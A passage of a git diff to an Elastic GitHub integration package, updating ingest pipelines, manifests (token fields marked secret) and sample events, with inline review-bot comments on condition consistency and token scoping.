+++ b/packages/github/data_stream/audit/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2020-11-18T17:05:48.837Z", "agent": { - "ephemeral_id": "fbdd879c-8de1-464b-a6a2-dbd9847eff73", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "9246e7d9-fcc1-46ab-b3fd-2d0888f2a94d", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.audit", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "repo.destroy", @@ -27,10 +27,10 @@ "configuration", "web" ], - "created": "2023-09-28T20:59:05.392Z", + "created": "2024-01-18T15:58:09.826Z", "dataset": "github.audit", "id": "LwW2vpJZCDS-WUmo9Z-ifw", - "ingested": "2023-09-28T20:59:06Z", + "ingested": "2024-01-18T15:58:19Z", "kind": "event", "original": "{\"@timestamp\":1605719148837,\"_document_id\":\"LwW2vpJZCDS-WUmo9Z-ifw\",\"action\":\"repo.destroy\",\"actor\":\"monalisa\",\"created_at\":1605719148837,\"org\":\"mona-org\",\"repo\":\"mona-org/mona-test-repo\",\"visibility\":\"private\"}", "type": [ @@ -58,4 +58,4 @@ "user": { "name": "monalisa" } -} +} \ No newline at end of file diff --git a/packages/github/data_stream/code_scanning/elasticsearch/ingest_pipeline/default.yml b/packages/github/data_stream/code_scanning/elasticsearch/ingest_pipeline/default.yml index 23c78fc40ee..97b60010b63 100644 --- a/packages/github/data_stream/code_scanning/elasticsearch/ingest_pipeline/default.yml +++ b/packages/github/data_stream/code_scanning/elasticsearch/ingest_pipeline/default.yml 
@@ -18,6 +18,9 @@ processors: - json: field: event.original target_field: github.code_scanning + - fail: + if: "!(ctx.github.code_scanning instanceof Map)" + message: Missing JSON object - fingerprint: fields: - github.code_scanning.number @@ -30,21 +33,21 @@ processors: - ISO8601 timezone: UTC target_field: "event.created" - if: ctx.github.code_scanning?.created_at != null + if: ctx.github.code_scanning.created_at != null - date: field: github.code_scanning.created_at formats: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.code_scanning?.created_at != null + if: ctx.github.code_scanning.created_at != null - date: field: github.code_scanning.updated_at formats: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.code_scanning?.updated_at != null + if: ctx.github.code_scanning.updated_at != null - rename: target_field: _temp field: github.code_scanning.repository @@ -112,11 +115,11 @@ processors: - set: field: github.repository.html_url value: "https://github.com/{{_temp.owner}}/{{_temp.repository}}" - if: "ctx.github.repository?.html_url == null && ctx._temp?.owner != null && ctx._temp?.repository != null" + if: ctx.github.repository?.html_url == null && ctx._temp?.owner != null && ctx._temp?.repository != null - set: field: github.repository.url value: "https://api.github.com/repos/{{_temp.owner}}/{{_temp.repository}}" - if: "ctx.github.repository?.url == null && ctx._temp?.owner != null && ctx._temp?.repository != null" + if: ctx.github.repository?.url == null && ctx._temp?.owner != null && ctx._temp?.repository != null - rename: field: _temp.repository target_field: github.repository.name @@ -130,7 +133,7 @@ processors: - rename: field: _temp.number target_field: github.code_scanning.number - if: ctx.github.code_scanning?.number == null + if: ctx.github.code_scanning.number == null ignore_missing: true - lowercase: field: github.code_scanning.state 
@@ -141,7 +144,7 @@ processors: - set: field: github.severity value: "{{github.code_scanning.rule.security_severity_level}}" - if: ctx.github.code_scanning?.rule?.security_severity_level != null + if: ctx.github.code_scanning.rule?.security_severity_level != null - set: field: github.severity value: "undefined" @@ -149,7 +152,7 @@ processors: - set: field: github.state value: "{{github.code_scanning.state}}" - if: ctx.github.code_scanning?.state != null + if: ctx.github.code_scanning.state != null - rename: target_field: _temp.dismissed_by field: github.code_scanning.dismissed_by @@ -188,7 +191,7 @@ processors: - script: lang: painless description: Calculate time taken to resolve the alerts - if: ctx.github.code_scanning?.fixed_at != null || ctx.github.code_scanning?.dismissed_at != null + if: ctx.github.code_scanning.fixed_at != null || ctx.github.code_scanning.dismissed_at != null source: | def time_to_resolution = new HashMap(); def fixedAtDt = ctx.github.code_scanning.fixed_at; @@ -214,15 +217,15 @@ processors: - rename: field: github.code_scanning.rule.id target_field: rule.id - if: ctx.github.code_scanning?.rule?.id != null + if: ctx.github.code_scanning.rule?.id != null - rename: field: github.code_scanning.rule.name target_field: rule.name - if: ctx.github.code_scanning?.rule?.name != null + if: ctx.github.code_scanning.rule?.name != null - rename: field: github.code_scanning.rule.description target_field: rule.description - if: ctx.github.code_scanning?.rule?.description != null + if: ctx.github.code_scanning.rule?.description != null - foreach: field: "github.code_scanning.rule.tags" processor: @@ -230,7 +233,7 @@ processors: field: tags value: "{{_ingest._value}}" ignore_missing: true - if: ctx.github.code_scanning?.rule?.tags != null + if: ctx.github.code_scanning.rule?.tags != null - remove: field: github.code_scanning.rule.tags ignore_missing: true 
@@ -243,7 +246,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - script: diff --git a/packages/github/data_stream/code_scanning/manifest.yml b/packages/github/data_stream/code_scanning/manifest.yml index 76f50bf3931..64b913f5f05 100644 --- a/packages/github/data_stream/code_scanning/manifest.yml +++ b/packages/github/data_stream/code_scanning/manifest.yml @@ -4,12 +4,13 @@ streams: - input: httpjson vars: - name: access_token - type: text + type: password title: Personal Access Token description: the GitHub Personal Access Token. Requires the 'public_repo' scope for public repositories and 'security_events' scope for private repositories. \nSee [List code scanning alerts for a repository](https://docs.github.com/en/rest/code-scanning#list-code-scanning-alerts-for-a-repository) multi: false required: true show_user: true + secret: true - name: owner type: text title: Repository owner diff --git a/packages/github/data_stream/code_scanning/sample_event.json b/packages/github/data_stream/code_scanning/sample_event.json index d90712e04ac..a667915dcd4 100644 --- a/packages/github/data_stream/code_scanning/sample_event.json +++ b/packages/github/data_stream/code_scanning/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2022-06-29T18:03:27.000Z", "agent": { - "ephemeral_id": "1a42d4f4-d9bb-4b37-ad28-0da74f732b5b", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "b359acfc-81ff-4631-8a85-05f9627d12e4", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.code_scanning", 
@@ -16,16 +16,16 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "code_scanning", "agent_id_status": "verified", "created": "2022-06-29T18:03:27.000Z", "dataset": "github.code_scanning", - "ingested": "2023-09-28T21:00:06Z", + "ingested": "2024-01-18T15:59:07Z", "kind": "alert", "original": "{\"created_at\":\"2022-06-29T18:03:27Z\",\"html_url\":\"https://github.com/sample_owner/sample_repo/security/code-scanning/91\",\"most_recent_instance\":{\"analysis_key\":\".github/workflows/codeql-analysis.yml:analyze\",\"category\":\".github/workflows/codeql-analysis.yml:analyze/language:javascript\",\"classifications\":[],\"commit_sha\":\"3244e8b15cc1b8f2732eecd69fc1890b737f0dda\",\"location\":{\"end_column\":50,\"end_line\":67,\"path\":\"routes/chatbot.ts\",\"start_column\":23,\"start_line\":67},\"message\":{\"text\":\"(Experimental) This may be a database query that depends on a user-provided value. Identified using machine learning.(Experimental) This may be a database query that depends on a user-provided value. Identified using machine learning.\"},\"ref\":\"refs/heads/master\",\"state\":\"open\"},\"number\":90,\"rule\":{\"description\":\"SQL database query built from user-controlled sources (experimental)\",\"id\":\"js/ml-powered/sql-injection\",\"security_severity_level\":\"high\",\"severity\":\"error\",\"tags\":[\"experimental\",\"external/cwe/cwe-089\",\"security\"]},\"state\":\"open\",\"tool\":{\"name\":\"CodeQL\",\"version\":\"2.9.4\"},\"updated_at\":\"2022-06-29T18:03:27Z\",\"url\":\"https://api.github.com/repos/sample_owner/sample_repo/code-scanning/alerts/91\"}" }, @@ -87,4 +87,4 @@ "external/cwe/cwe-089", "security" ] -} +} \ No newline at end of file 
diff --git a/packages/github/data_stream/dependabot/_dev/test/pipeline/test-ghas-dependabot-json.log-expected.json b/packages/github/data_stream/dependabot/_dev/test/pipeline/test-ghas-dependabot-json.log-expected.json index 6cc662989a1..82b79bf1ca2 100644 --- a/packages/github/data_stream/dependabot/_dev/test/pipeline/test-ghas-dependabot-json.log-expected.json +++ b/packages/github/data_stream/dependabot/_dev/test/pipeline/test-ghas-dependabot-json.log-expected.json @@ -28,7 +28,7 @@ "classification": "GENERAL", "cwes": [ { - "cweId": "CWE-20", + "cwe_id": "CWE-20", "description": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.", "name": "Improper Input Validation" } @@ -135,7 +135,7 @@ "classification": "GENERAL", "cwes": [ { - "cweId": "CWE-79", + "cwe_id": "CWE-79", "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')" } @@ -246,7 +246,7 @@ }, "cwes": [ { - "cweId": "CWE-79", + "cwe_id": "CWE-79", "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", "name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')" } @@ -358,7 +358,7 @@ }, "cwes": [ { - "cweId": "CWE-285", + "cwe_id": "CWE-285", "description": "The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.", "name": "Improper Authorization" } 
@@ -456,7 +456,7 @@ "classification": "GENERAL", "cwes": [ { - "cweId": "CWE-77", + "cwe_id": "CWE-77", "description": "The software constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.", "name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')" } @@ -555,7 +555,7 @@ }, "cwes": [ { - "cweId": "CWE-20", + "cwe_id": "CWE-20", "description": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.", "name": "Improper Input Validation" } @@ -672,7 +672,7 @@ }, "cwes": [ { - "cweId": "CWE-20", + "cwe_id": "CWE-20", "description": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.", "name": "Improper Input Validation" } @@ -781,7 +781,7 @@ }, "cwes": [ { - "cweId": "CWE-248", + "cwe_id": "CWE-248", "description": "An exception is thrown from a function, but it is not caught.", "name": "Uncaught Exception" } diff --git a/packages/github/data_stream/dependabot/elasticsearch/ingest_pipeline/default.yml b/packages/github/data_stream/dependabot/elasticsearch/ingest_pipeline/default.yml index b765582df21..2cff0f148d7 100644 --- a/packages/github/data_stream/dependabot/elasticsearch/ingest_pipeline/default.yml +++ b/packages/github/data_stream/dependabot/elasticsearch/ingest_pipeline/default.yml @@ -18,6 +18,9 @@ processors: - json: field: event.original target_field: github.dependabot + - fail: + if: "!(ctx.github.dependabot instanceof Map)" + message: Missing JSON object - set: field: _temp.updated_at value: "{{{_ingest.timestamp}}}" 
@@ -41,7 +44,7 @@ processors: - ISO8601 timezone: UTC target_field: "event.created" - if: ctx.github.dependabot?.created_at != null + if: ctx.github.dependabot.created_at != null - rename: field: github.dependabot.dependabotUpdate target_field: github.dependabot.dependabot_update @@ -72,21 +75,21 @@ processors: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.dependabot?.created_at != null + if: ctx.github.dependabot.created_at != null - date: field: github.dependabot.dismissed_at formats: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.dependabot?.dismissed_at != null + if: ctx.github.dependabot.dismissed_at != null - date: field: github.dependabot.fixed_at formats: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.dependabot?.fixed_at != null + if: ctx.github.dependabot.fixed_at != null - rename: field: github.dependabot.repository.isInOrganization target_field: github.dependabot.repository.is_in_organization @@ -118,7 +121,7 @@ processors: - set: field: _temp.cwes copy_from: github.dependabot.security_advisory.cwes.nodes - if: ctx.github.dependabot?.security_advisory?.cwes?.nodes != null + if: ctx.github.dependabot.security_advisory?.cwes?.nodes != null - remove: field: github.dependabot.security_advisory.cwes ignore_missing: true @@ -126,6 +129,16 @@ processors: field: github.dependabot.security_advisory.cwes copy_from: _temp.cwes if: ctx._temp?.cwes != null + - foreach: + field: github.dependabot.security_advisory.cwes + if: ctx.github?.dependabot?.security_advisory?.cwes instanceof List + ignore_failure: true + processor: + rename: + field: _ingest._value.cweId + tag: rename_cweId + target_field: _ingest._value.cwe_id + ignore_missing: true - rename: field: github.dependabot.securityVulnerability target_field: github.dependabot.security_vulnerability 
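Review bot: The new `foreach` over `github.dependabot.security_advisory.cwes` is inconsistent with the rest of the dependabot hunks: every other condition here removes the `?.` after `ctx.github.dependabot` because the `fail` processor added at the top of this pipeline guarantees it is a Map, yet this one reads `ctx.github?.dependabot?.security_advisory?.cwes instanceof List`. It also sets `ignore_failure: true` on the `foreach` although the inner rename already has `ignore_missing: true`, so a non-Map list element would be skipped silently instead of surfacing through the pipeline's failure handling. Suggest `if: ctx.github.dependabot.security_advisory?.cwes instanceof List` and dropping `ignore_failure: true`; if malformed elements are genuinely expected, guard the inner rename with its own `if` instead.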
@@ -226,19 +239,19 @@ processors: - set: field: "event.start" copy_from: github.dependabot.created_at - if: ctx.github.dependabot?.created_at != null + if: ctx.github.dependabot.created_at != null - set: field: "event.end" copy_from: github.dependabot.fixed_at - if: ctx.github.dependabot?.fixed_at != null + if: ctx.github.dependabot.fixed_at != null - set: field: "event.end" copy_from: github.dependabot.dismissed_at - if: ctx.event?.end == null && ctx.github.dependabot?.dismissed_at != null + if: ctx.event?.end == null && ctx.github.dependabot.dismissed_at != null - script: lang: painless description: Calculate time taken to resolve the alerts - if: ctx?.event?.start != null && ctx?.event?.end != null + if: ctx.event?.start != null && ctx.event?.end != null source: >- ZonedDateTime start = ZonedDateTime.parse(ctx.event.start); ZonedDateTime end = ZonedDateTime.parse(ctx.event.end); ctx.event.duration = ChronoUnit.NANOS.between(start, end); ################################# @@ -253,7 +266,7 @@ processors: - set: field: github.state copy_from: github.dependabot.state - if: ctx.github.dependabot?.state != null + if: ctx.github.dependabot.state != null - set: field: github.severity copy_from: vulnerability.severity @@ -275,7 +288,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - script: diff --git a/packages/github/data_stream/dependabot/manifest.yml b/packages/github/data_stream/dependabot/manifest.yml index b8c760c1081..7286dd78e8e 100644 --- a/packages/github/data_stream/dependabot/manifest.yml +++ b/packages/github/data_stream/dependabot/manifest.yml 
@@ -4,12 +4,13 @@ streams: - input: httpjson vars: - name: access_token - type: text + type: password title: Personal Access Token description: The GitHub Personal Access Token. \nSee [Authenticating with GraphQL](https://docs.github.com/en/graphql/guides/forming-calls-with-graphql#authenticating-with-graphql) multi: false required: true show_user: true + secret: true - name: owner type: text title: Repository owner diff --git a/packages/github/data_stream/dependabot/sample_event.json b/packages/github/data_stream/dependabot/sample_event.json index f822f7b3c2a..ad1c8f20831 100644 --- a/packages/github/data_stream/dependabot/sample_event.json +++ b/packages/github/data_stream/dependabot/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2022-07-11T11:39:07.000Z", "agent": { - "ephemeral_id": "d5a942e6-27ef-4ef0-b922-fbc0084f6e1c", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "786d0d42-a64a-43ae-846d-03d72b473384", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.dependabot", 
@@ -16,16 +16,16 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "dependabot", "agent_id_status": "verified", "created": "2022-07-11T11:39:07.000Z", "dataset": "github.dependabot", - "ingested": "2023-09-28T21:01:11Z", + "ingested": "2024-01-18T15:59:57Z", "kind": "alert", "original": "{\"createdAt\":\"2022-07-11T11:39:07Z\",\"dependabotUpdate\":{\"error\":{\"body\":\"The currently installed version can't be determined.\\n\\nTo resolve the issue add a supported lockfile (package-lock.json or yarn.lock).\",\"errorType\":\"dependency_file_not_supported\",\"title\":\"Dependabot can't update vulnerable dependencies without a lockfile\"},\"pullRequest\":null},\"dependencyScope\":\"RUNTIME\",\"dismissReason\":null,\"dismissedAt\":null,\"dismisser\":null,\"fixedAt\":null,\"number\":1,\"repository\":{\"description\":\"OWASP Juice Shop: Probably the most modern and sophisticated insecure web application\",\"isInOrganization\":false,\"isPrivate\":false,\"name\":\"sample_repo\",\"owner\":{\"login\":\"sample_owner\",\"url\":\"https://github.com/sample_owner\"},\"url\":\"https://github.com/sample_owner/sample_repo\"},\"securityAdvisory\":{\"classification\":\"GENERAL\",\"cvss\":{\"score\":0,\"vectorString\":null},\"cwes\":{\"nodes\":[{\"cweId\":\"CWE-20\",\"description\":\"The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.\",\"name\":\"Improper Input Validation\"}]},\"description\":\"Versions 4.2.1 and earlier of `jsonwebtoken` are affected by a verification bypass vulnerability. 
This is a result of weak validation of the JWT algorithm type, occuring when an attacker is allowed to arbitrarily specify the JWT algorithm.\\n\\n\\n\\n\\n## Recommendation\\n\\nUpdate to version 4.2.2 or later.\",\"ghsaId\":\"GHSA-c7hr-j4mj-j2w6\",\"identifiers\":[{\"type\":\"GHSA\",\"value\":\"GHSA-c7hr-j4mj-j2w6\"},{\"type\":\"CVE\",\"value\":\"CVE-2015-9235\"}],\"origin\":\"UNSPECIFIED\",\"permalink\":\"https://github.com/advisories/GHSA-c7hr-j4mj-j2w6\",\"publishedAt\":\"2018-10-09T00:38:30Z\",\"references\":[{\"url\":\"https://nvd.nist.gov/vuln/detail/CVE-2015-9235\"},{\"url\":\"https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687\"},{\"url\":\"https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/\"},{\"url\":\"https://github.com/advisories/GHSA-c7hr-j4mj-j2w6\"},{\"url\":\"https://www.npmjs.com/advisories/17\"},{\"url\":\"https://www.timmclean.net/2015/02/25/jwt-alg-none.html\"},{\"url\":\"https://nodesecurity.io/advisories/17\"}],\"severity\":\"CRITICAL\",\"summary\":\"Verification Bypass in jsonwebtoken\",\"updatedAt\":\"2021-01-08T19:00:39Z\",\"withdrawnAt\":null},\"securityVulnerability\":{\"firstPatchedVersion\":{\"identifier\":\"4.2.2\"},\"package\":{\"ecosystem\":\"NPM\",\"name\":\"jsonwebtoken\"},\"severity\":\"CRITICAL\",\"updatedAt\":\"2018-11-30T19:54:28Z\",\"vulnerableVersionRange\":\"\\u003c 4.2.2\"},\"state\":\"OPEN\",\"vulnerableManifestFilename\":\"package.json\",\"vulnerableManifestPath\":\"package.json\",\"vulnerableRequirements\":\"= 0.4.0\"}", "start": "2022-07-11T11:39:07Z" @@ -46,7 +46,7 @@ "classification": "GENERAL", "cwes": [ { - "cweId": "CWE-20", + "cwe_id": "CWE-20", "description": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.", "name": "Improper Input Validation" } 
@@ -129,4 +129,4 @@
 },
 "severity": "critical"
 }
-}
+}
\ No newline at end of file
diff --git a/packages/github/data_stream/issues/elasticsearch/ingest_pipeline/default.yml b/packages/github/data_stream/issues/elasticsearch/ingest_pipeline/default.yml
index 7f76d37970d..2154fc53bc0 100644
--- a/packages/github/data_stream/issues/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/github/data_stream/issues/elasticsearch/ingest_pipeline/default.yml
@@ -18,8 +18,11 @@ processors:
 - json:
 field: event.original
 target_field: github.issues
+ - fail:
+ if: "!(ctx.github.issues instanceof Map)"
+ message: Missing JSON object
 - fingerprint:
- if: ctx.github?.issues?.url != null
+ if: ctx.github.issues.url != null
 fields:
 - github.issues.url
 target_field: "_id"
@@ -30,7 +33,7 @@ processors:
 - ISO8601
 timezone: UTC
 target_field: "@timestamp"
- if: ctx.github.issues?.created_at != null
+ if: ctx.github.issues.created_at != null
 - set:
 field: event.created
 copy_from: "@timestamp"
@@ -39,7 +42,7 @@ processors:
 field: github.issues.is_pr
 value: false
 - set:
- if: ctx.github?.issues?.pull_request != null
+ if: ctx.github.issues.pull_request != null
 field: github.issues.is_pr
 value: true
 - date:
@@ -48,7 +51,7 @@ processors:
 - ISO8601
 timezone: UTC
 target_field: github.issues.updated_at
- if: ctx.github.issues?.updated_at != null
+ if: ctx.github.issues.updated_at != null
 - dissect:
 field: github.issues.url
 pattern: "https://api.github.com/repos/%{_temp_.owner}/%{_temp_.repository}/issues/%{_temp_.number}"
@@ -56,23 +59,23 @@ processors:
 - set:
 field: github.repository.name
 value: "{{_temp_.repository}}"
- if: "ctx._temp_?.repository != null"
+ if: ctx._temp_?.repository != null
 - set:
 field: github.repository.html_url
 value: "https://github.com/{{_temp_.owner}}/{{_temp_.repository}}"
- if: "ctx._temp_?.owner != null && ctx._temp_?.repository != null"
+ if: ctx._temp_?.owner != null && ctx._temp_?.repository != null
 - set:
 field: github.repository.url
 value: "https://api.github.com/repos/{{_temp_.owner}}/{{_temp_.repository}}"
- if: "ctx._temp_?.owner != null && ctx._temp_?.repository != null"
+ if: ctx._temp_?.owner != null && ctx._temp_?.repository != null
 - set:
 field: github.repository.owner.login
 value: "{{_temp_.owner}}"
- if: "ctx._temp_?.owner != null"
+ if: ctx._temp_?.owner != null
 - set:
 field: github.state
 value: "{{github.issues.state}}"
- if: ctx.github.issues?.state != null
+ if: ctx.github.issues.state != null
 - foreach:
 field: github.issues.assignees
 ignore_missing: true
@@ -143,7 +146,7 @@ processors:
 - script:
 lang: painless
 description: Calculate time taken to close an issue
- if: ctx.github?.issues?.closed_at != null
+ if: ctx.github.issues.closed_at != null
 source: |
 def time_to_close = new HashMap();
 def closedAtDt = ctx.github.issues.closed_at;
@@ -160,7 +163,7 @@ processors:
 - set:
 field: user.name
 copy_from: github.issues.user.login
- if: ctx.github?.issues?.user?.login != null
+ if: ctx.github.issues.user?.login != null
 - convert:
 field: github.issues.user.id
 type: string
@@ -169,7 +172,7 @@ processors:
 - append:
 field: user.roles
 value: ['site_admin']
- if: 'ctx.github?.issues?.user?.site_admin != null && ctx.github?.issues?.user?.site_admin == true'
+ if: ctx.github.issues.user?.site_admin != null && ctx.github.issues.user?.site_admin == true
 allow_duplicates: false
 ###################
 # Related ECS fields #
@@ -181,7 +184,7 @@ processors:
 allow_duplicates: false
 - foreach:
 field: github.issues.assignees
- if: ctx.github?.issues?.assignees != null
+ if: ctx.github.issues.assignees != null
 processor:
 append:
 field: related.user
@@ -198,11 +201,11 @@ processors:
 - remove:
 field:
 - github.issues.state
- if: "ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields'))"
+ if: ctx.tags?.contains('preserve_duplicate_custom_fields') != true
 ignore_missing: true
 - remove:
 field: event.original
- if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+ if: ctx.tags?.contains('preserve_original_event') != true
 ignore_failure: true
 ignore_missing: true
 - script:
diff --git a/packages/github/data_stream/issues/manifest.yml b/packages/github/data_stream/issues/manifest.yml
index 886e2092fd8..75c074e1d3c 100644
--- a/packages/github/data_stream/issues/manifest.yml
+++ b/packages/github/data_stream/issues/manifest.yml
@@ -5,12 +5,13 @@ streams:
 - input: httpjson
 vars:
 - name: access_token
- type: text
+ type: password
 title: Personal Access Token
 description: the GitHub Personal Access Token.
 multi: false
 required: true
 show_user: true
+ secret: true
 - name: owner
 type: text
 title: Repository owner
diff --git a/packages/github/data_stream/issues/sample_event.json b/packages/github/data_stream/issues/sample_event.json
index 894f393c22f..e922b4d30b9 100644
--- a/packages/github/data_stream/issues/sample_event.json
+++ b/packages/github/data_stream/issues/sample_event.json
@@ -1,11 +1,11 @@
 {
 "@timestamp": "2011-04-22T13:33:48.000Z",
 "agent": {
- "ephemeral_id": "f9522412-8a4b-49a9-9c7c-0f5e5925ca64",
- "id": "f86f831a-cae2-454f-a985-4f579b0ee515",
+ "ephemeral_id": "584c482b-3ffa-4d41-8926-c8194940a361",
+ "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c",
 "name": "docker-fleet-agent",
 "type": "filebeat",
- "version": "8.7.1"
+ "version": "8.12.0"
 },
 "data_stream": {
 "dataset": "github.issues",
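Review bot: The `access_token` var in the issues manifest now correctly becomes `type: password` with `secret: true`, but its description `the GitHub Personal Access Token.` still tells the operator nothing about how narrowly to scope that token, whereas the secret_scanning manifest in this same diff spells out exactly which scopes its token needs. A token minted without guidance tends to be over-scoped, and this integration only reads issues, so the description should state the minimum scope required for that, in the same style as the secret_scanning one. Something along the lines of `description: the GitHub Personal Access Token. Grant only the minimum scope required to read issues in the target repositories; see the GitHub REST docs for issues.` would do, filling in the concrete scope name from the GitHub documentation rather than guessing it here.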
@@ -16,16 +16,16 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "event", "agent_id_status": "verified", "created": "2011-04-22T13:33:48.000Z", "dataset": "github.issues", - "ingested": "2023-09-28T21:02:11Z", + "ingested": "2024-01-18T16:00:55Z", "kind": "event", "original": "{\"active_lock_reason\":\"too heated\",\"assignee\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"assignees\":[{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.gith
ub.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"}],\"author_association\":\"COLLABORATOR\",\"body\":\"I'm having a problem with this.\",\"closed_at\":null,\"closed_by\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"comments\":0,\"comments_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/comments\",\"created_at\":\"2011-04-22T13:33:48Z\",\"events_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/events\",\"html_url\":\"https://github.com/octocat/Hello-World/issues/1347\",\"id\":1,\"labels\":[{\"color\":\"f29513\",\"default\":true,\"description\":\"Something isn't 
